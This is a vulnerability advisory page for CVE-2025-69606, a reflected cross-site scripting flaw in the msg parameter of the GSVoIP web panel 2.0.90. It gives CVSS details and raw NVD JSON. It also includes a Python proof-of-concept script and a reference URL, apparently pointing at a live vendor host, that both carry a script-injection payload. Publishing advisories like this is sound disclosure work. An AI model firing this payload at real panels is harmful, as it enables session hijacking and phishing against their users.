Security Vulnerability Report
中文
CVE-2025-69606 CVSS 6.1 MEDIUM

CVE-2025-69606

Published: 2026-05-01 18:16:14
Last Modified: 2026-05-07 15:15:07

Description

Cross-Site Scripting (XSS) vulnerability was discovered in the GSVoIP web panel version 2.0.90. The `msg` parameter in the `/painel/gateways.php/error` endpoint does not properly sanitize user-supplied input, allowing attackers to inject arbitrary JavaScript into the HTML response. A remote attacker can exploit this vulnerability by sending a crafted URL to a victim, leading to unauthorized script execution, session hijacking, phishing, or other client-side attacks.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

GSVoIP web panel 2.0.90

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2025-69606 # Target: GSVoIP web panel 2.0.90 # Endpoint: /painel/gateways.php/error import requests def exploit_xss(target_url): # Payload to close existing script tag and inject alert payload = "</script><script>alert(document.domain)</script>" # Construct the full URL with the vulnerable parameter params = {'msg': payload} try: response = requests.get(target_url, params=params, timeout=5) if response.status_code == 200: print(f"[+] Request sent to: {response.url}") print("[+] Check the browser for an alert box showing the domain.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Example usage target = "http://target-ip/painel/gateways.php/error" exploit_xss(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69606", "sourceIdentifier": "[email protected]", "published": "2026-05-01T18:16:13.607", "lastModified": "2026-05-07T15:15:06.770", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Scripting (XSS) vulnerability was discovered in the GSVoIP web panel version 2.0.90. The `msg` parameter in the `/painel/gateways.php/error` endpoint does not properly sanitize user-supplied input, allowing attackers to inject arbitrary JavaScript into the HTML response. A remote attacker can exploit this vulnerability by sending a crafted URL to a victim, leading to unauthorized script execution, session hijacking, phishing, or other client-side attacks."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/Razielx64/CVE-2025-69606-GSVoIP-XSS", "source": "[email protected]"}, {"url": "https://sip2.solutionsvoip.com.br/painel/gateways.php/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E", "source": "[email protected]"}, {"url": "https://www.solutionsvoip.com.br/", "source": "[email protected]"}, {"url": "https://github.com/Razielx64/CVE-2025-69606-GSVoIP-XSS", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}